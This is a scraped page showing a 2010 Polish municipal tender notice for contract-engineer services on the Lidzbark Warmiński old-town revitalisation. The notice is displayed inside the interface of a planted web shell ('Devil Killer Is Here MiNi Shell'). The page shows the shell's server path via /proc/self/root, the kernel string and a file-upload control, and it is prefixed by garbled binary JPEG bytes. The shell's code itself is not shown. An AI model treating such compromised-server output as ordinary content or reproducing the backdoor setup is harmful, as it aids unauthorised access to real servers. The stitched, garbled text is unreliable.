JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100618/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100618/173108-N-2010.html

<p class="kh_header"><b>Lidzbark Warmiński: Pełnienie funkcji inżyniera kontraktu w projekcie pn.:Rewitalizacja centrum starego miasta I etap ul. Powstańców Warszawy, Plac Wolności, Ratuszowa, budynek po Urzędzie Miasta oraz mury obronne</b><br>
<b>Numer ogłoszenia: 173108 - 2010; data zamieszczenia: 18.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Lidzbark Warmiński , ul. A. Świętochowskiego 14, 11-100 Lidzbark Warmiński, woj. warmińsko-mazurskie, tel. 089 7678500, faks 089 7672303.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://lidzbarkw-um.bip-wm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inżyniera kontraktu w projekcie pn.:Rewitalizacja centrum starego miasta I etap ul. Powstańców Warszawy, Plac Wolności, Ratuszowa, budynek po Urzędzie Miasta oraz mury obronne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest pełnienie funkcji Inżyniera Kontraktu projektu pn.:      
Rewitalizacja centrum starego miasta I etap  ul. Powstańców Warszawy, Plac Wolności, Ratuszowa, budynek po Urzędzie Miasta oraz mury obronne, z podziałem na następujące zadania:

a) Zadanie nr 1 - Pełnienie funkcji inżyniera kontraktu w projekcie pn.: Rewitalizacja 
  centrum starego miasta I etap - ul. Powstańców Warszawy, Plac Wolności, Ratuszowa, w okresie od dnia podpisania umowy do 30.06.2011 roku plus 36 miesięczny okres gwarancji jakości i okres rękojmi za wady zrealizowanego projektu.
b) Zadanie nr 2 - Pełnienie funkcji inżyniera kontraktu w projekcie pn.: Rewitalizacja 
  centrum starego miasta I etap - Budynek po Urzędzie Miasta,  w okresie od dnia   
  podpisania umowy do 30.06.2011 roku plus 36 miesięczny okres gwarancji jakości   i okres rękojmi za wady zrealizowanego projektu.
c) Zadanie nr 3 - Pełnienie funkcji inżyniera kontraktu w projekcie pn.: Rewitalizacja    
 centrum starego miasta I etap - mury obronne, w okresie od dnia podpisania umowy do 30.06.2011 roku plus 36 miesięczny okres gwarancji jakości i okres rękojmi za wady zrealizowanego projektu.
2. Podstawowe obowiązki Wykonawcy:
  1) wykonywanie wszelkich działań wynikających z przepisów prawa lub wytycznych   Instytucji Zarządzającej Regionalnym Programem Operacyjnym Warmia i Mazury na lata 2007-2013, które umożliwią Zamawiającemu prawidłową realizację Projektu     
współfinansowanego ze środków Unii Europejskiej, w sposób zgodny z umową  o dofinansowanie, instrukcjami, założeniami programowymi i dyrektywami, w tym m.in. opracowanie, przygotowanie i terminowe  przekazanie w imieniu Zamawiającego do 
Instytucji Zarządzającej raportów, sprawozdań, wniosków o płatność i wszelkich innych dokumentów będących wypełnieniem obowiązków nałożonych na Beneficjenta środków unijnych przy realizacji Projektów dofinansowywanych w ramach RPO WiM.
  2) pełnienie kompleksowego nadzoru inwestorskiego nad realizacją projektu zgodnie  z postanowieniami decyzji pozwolenia na budowę, przepisami prawa budowlanego       i innymi obowiązującymi w tym zakresie przepisami, a w szczególności:
    a) reprezentowanie inwestora na budowie poprzez sprawdzenia zgodności realizowanego projektu z umową, dokumentacją projektową i pozwoleniem na budowę, zasadami wiedzy technicznej oraz przepisami techniczno-budowlanymi i Polskimi Normami,
b) przeciwdziałanie nieprawidłowościom na placu budowy w związku z realizacją 
    projektu oraz podejmowanie niezbędnych w tym zakresie czynności,
c) sprawdzanie jakości wykonywanych robót, wbudowanych wyrobów budowlanych,  a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych  i niedopuszczonych do obrotu i stosowania w budownictwie,
d) sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, 
    uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych  oraz przygotowanie i udział w czynnościach odbioru końcowego projektu i przekazanie go do użytkowania,
e) potwierdzanie faktycznie wykonanych robót oraz usunięcia wad, a także kontrolowanie rozliczeń budowy poprzez potwierdzenie wykonanego przez realizatora robót budowlanych, zakresu rzeczowego i finansowego projektu, w szczególności w zakresie zgodności przyjętych założeń w harmonogramie rzeczowo-finansowym, w protokołach odbioru robót, stanowiących podstawę do wystawiania faktur przez realizatora robót,
f) sprawdzenie harmonogramu rzeczowo-finansowego dostarczonego przez realizatora 
  robót w zakresie zgodności przyjętych założeń z dokumentacją projektową i  kosztorysem ofertowym, w terminie nie dłuższym niż 7 dni od dostarczenia przez  
Zamawiającego.
   g) kontrola postępu prac i robót,
   h) sprawdzanie kosztorysów inwestorskich, ofertowych, robót dodatkowych i zamiennych pod względem kompletności zawartości i prawidłowości ich wykonania.
   i) udział i przewodnictwo w naradach roboczych (sporządzanie protokołów z narad) na  etapie realizacji projektu mających na celu m.in. rozstrzyganie technicznych spraw budowy, omawianie przebiegu realizacji budowy, itp.
j) opracowanie oraz przekazywanie Zamawiającemu niezbędnych dokumentów do   
   uruchomienia finansowania projektu,
k) stwierdzanie gotowości  wykonanych robót do odbioru,
l) dokonywanie obiorów częściowych robót oraz odbioru końcowego,
ł) przekazywanie Zamawiającemu protokołów odbioru oraz dokumentacji powykonawczej,
m) obecność podczas kontroli zewnętrznych w trakcie realizacji projektu i po jego    
     zakończeniu,
n) dokonywanie czynności sprawdzenia kalkulacji szczegółowych lub kosztorysów 
    przedkładanych przez Wykonawcę lub Wykonawców robót, pod względem zgodności  wyceny z warunkami umownymi,
o) sprawdzenie faktur Wykonawcy oraz dokumentów załączonych do rozliczenia robót - projektu,
p) uzyskanie na rzecz Zamawiającego decyzji o dopuszczeniu zrealizowanego projektu do użytkowania,
r) udział w pracach komisji powołanych do przeglądów gwarancyjnych dla zrealizowanego projektu  i o ile zajdzie taka potrzeba udział w pracach komisji powołanych do ustalenia przyczyn stwierdzonych wad i usterek w zrealizowanym i przekazanym do użytkowania obiekcie oraz kontrolowania ich usunięcia w okresie trwania gwarancji, 
s) Inne czynności nie wymienione wyżej, które są niezbędne do prawidłowej realizacji 
        projektu.
3. Podstawowe elementy projektu objęte przedmiotem zamówienia i zakresem:
1) Zadania nr 1 - Pełnienie funkcji inżyniera kontraktu w projekcie pn.: Rewitalizacja 
    centrum starego miasta I etap - ul. Powstańców Warszawy, Plac Wolności, 
    Ratuszowa,  w okresie od dnia podpisania umowy do 30.06.2011 roku plus 36 
    miesięczny okres gwarancji jakości i okres rękojmi za wady zrealizowanego projektu:
        a) roboty drogowe,
 	b) sieć wodociągowa,
 	c) sieć kanalizacji deszczowej,
 	d) sieć telekomunikacyjna,
 	e) oświetlenie,
 	f) schody,
 	g) zieleń i mała architektura,
oraz pozostałe roboty, które wykonawca robót budowlanych obowiązany jest wykonać zgodnie z dokumentacją projektową i specyfikacją techniczną wykonania i odbioru robót budowlanych.

      2) Zadania nr 2 - Pełnienie funkcji inżyniera kontraktu w projekcie pn.: Rewitalizacja 
     centrum starego miasta I etap - Budynek po Urzędzie Miasta, w okresie od dnia   
     podpisania umowy do 30.06.2011 roku plus 36 miesięczny okres gwarancji jakości                    
     i okres rękojmi za wady zrealizowanego projektu:
     	a) roboty konstrukcyjne,
     	b) roboty wykończeniowe,
     	c) instalacje sanitarne,
    	 d) instalacja wentylacji mechanicznej,
    	 e) Instalacje teletechniczne,
    	 f) instalacja elektryczna,
    	oraz pozostałe roboty, które wykonawca robót budowlanych obowiązany jest 	wykonać zgodnie z dokumentacją projektową i specyfikacją techniczną wykonania                	i odbioru robót budowlanych.

3) Zadania nr 3 - Pełnienie funkcji inżyniera kontraktu w projekcie pn.: Rewitalizacja   
    centrum starego miasta I etap - mury obronne, w okresie od dnia podpisania umowy 
    do 30.06.2011 roku plus 36 miesięczny okres gwarancji jakości i okres rękojmi za 
     wady zrealizowanego projektu:
	1) wycinka drzew,
     	2) roboty rozbiórkowe,
     	3) roboty ziemne,
     	4) rewaloryzacja murów z kamienia,
     	5) rewaloryzacja ścian z cegły gotyckiej,
     	6) wykonanie trawników,
     	7) wykonanie nawierzchni,
     	8) rozbiórka przybudówki,
     	9) sieć kanalizacji deszczowej wraz z przyłączami  i drenażem odwadniającym,
	oraz pozostałe roboty, które wykonawca robót budowlanych obowiązany jest 	wykonać zgodnie z dokumentacją projektową i specyfikacją techniczną wykonania    i odbioru robót budowlanych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.54.10.00-2, 71.63.13.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) W przypadku składania oferty na  zadanie nr 1 - Pełnienie funkcji inżyniera kontraktu w  projekcie pn.: Rewitalizacja centrum starego miasta I etap - ul. Powstańców Warszawy, Plac Wolności, Ratuszowa, w okresie od dnia podpisania umowy do  30.06.2011 roku plus 36 miesięczny okres gwarancji jakości i okres rękojmi za wady zrealizowanego projektu,  warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonał co najmniej jedną usługę polegającą na pełnieniu funkcji inżyniera kontraktu w robotach budowlanych polegających na budowie lub przebudowie ulic lub dróg lub innych ciągów komunikacyjnych, łącznie z    infrastrukturą techniczną, o wartości  każdej roboty	nie mniejszej niż 3 000 000,00 zł brutto (słownie: trzy miliony złotych). 
 Wykonawca zobowiązany jest do złożenia dokumentów potwierdzających, że usługi te zostały wykonane należycie. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą  wykazać, że łącznie spełniają powyższy warunek.
   
b) W przypadku składania oferty na  zadanie nr 2 - Pełnienie funkcji inżyniera kontraktu  w projekcie pn.: Rewitalizacja centrum starego miasta I etap - Budynek po Urzędzie  Miasta, w okresie od dnia podpisania umowy do 30.06.2011 roku plus 36 miesięczny okres gwarancji jakości i okres rękojmi za wady zrealizowanego projektu, 
     warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że w ciągu ostatnich 3 
     lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonał co najmniej jedną usługę  polegającą na pełnieniu funkcji  inżyniera kontraktu w robotach budowlanych polegających na budowie lub przebudowie lub remoncie budynku łącznie z urządzeniami budowlanymi, o wartości każdej roboty nie mniejszej niż  1 900 000,00 zł brutto (słownie: jeden milion dziewięćset tysięcy złotych). Wykonawca zobowiązany jest do złożenia dokumentów  potwierdzających, że usługi te zostały wykonane należycie.  
     Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą    
     wykazać, że łącznie spełniają powyższy warunek.
             
c) W przypadku składania oferty na zadanie nr 3 - Pełnienie funkcji inżyniera kontraktu  w projekcie pn.: Rewitalizacja centrum starego miasta I etap   - mury obronne, w okresie od dnia podpisania umowy do 30.06.2011 roku plus 36 miesięczny okres gwarancji jakości i okres rękojmi za wady zrealizowanego projektu,  warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonał co najmniej   jedną usługę  polegającą na pełnieniu funkcji  inżyniera kontraktu w robotach budowlanych  polegających na   przebudowie  lub odbudowie lub nadbudowie lub remoncie budynku lub  innego obiektu  budowlanego pod nadzorem konserwatorskim, o wartości każdej roboty  nie mniejszej  niż  2 500 000,00 zł brutto (słownie: dwa miliony pięćset tysięcy złotych). 
   Wykonawca zobowiązany jest do złożenia dokumentów potwierdzających, że usługi te zostały wykonane należycie.  
   Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą    
   wykazać, że łącznie spełniają powyższy warunek.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) W przypadku składnia oferty na zadanie nr 1- Pełnienie funkcji inżyniera kontraktu 
     w projekcie pn.: Rewitalizacja centrum starego miasta I etap - ul. Powstańców 
     Warszawy, Plac Wolności, Ratuszowa, w okresie od dnia podpisania umowy do 
     30.06.2011 roku plus 36 miesięczny okres gwarancji jakości i okres rękojmi za wady  zrealizowanego projektu, warunek ten zostanie spełniony jeżeli Wykonawca  wykaże, że dysponuje lub będzie dysponował następującymi osobami zdolnymi do wykonania zamówienia, posiadającymi uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie: 
-  	Kierownik Zespołu - Inspektor nadzoru inwestorskiego - uprawnienia 		budowlane  w specjalności drogowej bez ograniczeń uprawniające do 			kierowania robotami 	budowlanymi, wykształcenie wyższe, doświadczenie 
w sprawowaniu samodzielnych funkcji technicznych w budownictwie - min. 10 	lat.
     - 	Inspektor nadzoru inwestorskiego - branża sanitarna - uprawnienia 		budowlane w specjalności instalacyjnej w zakresie sieci wodociągowych                   i kanalizacyjnych bez ograniczeń, uprawniające do kierowania robotami 			budowlanymi, wykształcenie 	wyższe, doświadczenie w sprawowaniu 			samodzielnych funkcji technicznych w budownictwie - min. 3 lata.
    - 	Inspektor nadzoru inwestorskiego - branża elektryczna - uprawnienia 		budowlane w specjalności w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, uprawniające do kierowania robotami 		budowlanymi, wykształcenie wyższe, doświadczenie w sprawowaniu 			samodzielnych funkcji technicznych w budownictwie - min. 3 lata,
oraz  co najmniej 1 osobą na stanowisku Specjalisty ds. Rozliczeń, posiadającą 	wyższe wykształcenie ekonomiczne lub techniczne lub zarządzanie oraz co 		najmniej 5 -letnie doświadczenie zawodowe, która uczestniczyła w rozliczeniu 	przynajmniej jednej zakończonej inwestycji realizowanej z udziałem środków 		unijnych, która została odebrana i rozliczona bez uwag.
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia 		muszą  wykazać, że łącznie spełniają powyższy warunek.
b) w przypadku składania oferty na zadanie nr 2 - Pełnienie funkcji inżyniera kontraktu w projekcie pn.: Rewitalizacja centrum starego miasta I etap - Budynek po Urzędzie   Miasta, w okresie od dnia podpisania umowy do 30.06.2011 roku plus 36 miesięczny 
 okres gwarancji jakości i okres rękojmi za wady zrealizowanego projektu, warunek ten 
    zostanie spełniony jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował 
    następującymi osobami zdolnymi do wykonania zamówienia, posiadającymi uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie:

   -  	Kierownik Zespołu - Inspektor nadzoru inwestorskiego - uprawnienia 		budowlane w specjalności konstrukcyjno-budowlanej  bez ograniczeń 			uprawniające do kierowania robotami budowlanymi, wykształcenie wyższe, 		doświadczenie w sprawowaniu samodzielnych funkcji technicznych w budownictwie - min. 10 lat.
   - 			Inspektor nadzoru inwestorskiego - branża sanitarna - uprawnienia budowlane w specjalności instalacyjnej w zakresie instalacji i urządzeń 			cieplnych, wentylacyjnych, wodociągowych i  kanalizacyjnych bez ograniczeń, 	uprawniające do kierowania robotami budowlanymi, wykształcenie wyższe, 		doświadczenie w sprawowaniu samodzielnych funkcji technicznych w budownictwie - min. 3 lata.
    - 	Inspektor nadzoru inwestorskiego - branża elektryczna - uprawnienia 		budowlane  w specjalności w zakresie sieci, instalacji i urządzeń elektrycznych  i elektroenergetycznych bez ograniczeń, uprawniające do kierowania robotami 		budowlanymi, wykształcenie wyższe, doświadczenie w sprawowaniu 			samodzielnych funkcji technicznych w budownictwie - min. 3 lata.
oraz  co najmniej 1 osobą na stanowisku Specjalisty ds. Rozliczeń, posiadającą 	wyższe wykształcenie ekonomiczne lub techniczne lub zarządzanie oraz co 		najmniej 5 -letnie doświadczenie zawodowe, która uczestniczyła w rozliczeniu 	przynajmniej jednej zakończonej inwestycji realizowanej z udziałem środków 		unijnych, która została odebrana i rozliczona bez uwag.
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą    
wykazać, że łącznie spełniają powyższy warunek.
c) W przypadku składania oferty na zadanie nr 3 - Pełnienie funkcji inżyniera kontraktu w projekcie pn.: Rewitalizacja centrum starego miasta I etap - mury  obronne, w okresie od dnia podpisania umowy do 30.06.2011 roku plus 36 miesięczny okres gwarancji jakości i okres rękojmi za wady zrealizowanego projektu,  warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował następującymi osobami zdolnymi do wykonania zamówienia, posiadającymi uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie:

   - 			Kierownik Zespołu - Inspektor nadzoru inwestorskiego - uprawnienia budowlane w specjalności konstrukcyjno-budowlanej  bez ograniczeń 			uprawniające do kierowania robotami budowlanymi, wykształcenie wyższe, 		doświadczenie w sprawowaniu samodzielnych funkcji technicznych  w budownictwie - min. 10 lat.
   - 	Inspektor nadzoru inwestorskiego - branża sanitarna - uprawnienia 		budowlane w specjalności instalacyjnej w zakresie sieci  kanalizacyjnych bez 		ograniczeń, uprawniające do kierowania robotami budowlanymi, wykształcenie 	wyższe, doświadczenie w sprawowaniu samodzielnych funkcji technicznych 
w budownictwie - min. 3 lata.
oraz  
co najmniej 1 osobą na stanowisku Specjalisty ds. Rozliczeń, posiadającą 		wyższe wykształcenie ekonomiczne lub techniczne lub zarządzanie oraz co 		najmniej 5 -letnie doświadczenie zawodowe, która uczestniczyła w rozliczeniu 	przynajmniej jednej zakończonej inwestycji realizowanej z udziałem środków 		unijnych, która została odebrana i rozliczona bez uwag</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, iż posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej  z przedmiotem zamówienia na wartość co najmniej 100 000,00 zł (słownie: sto tysięcy złotych).
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają powyższy warunek.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
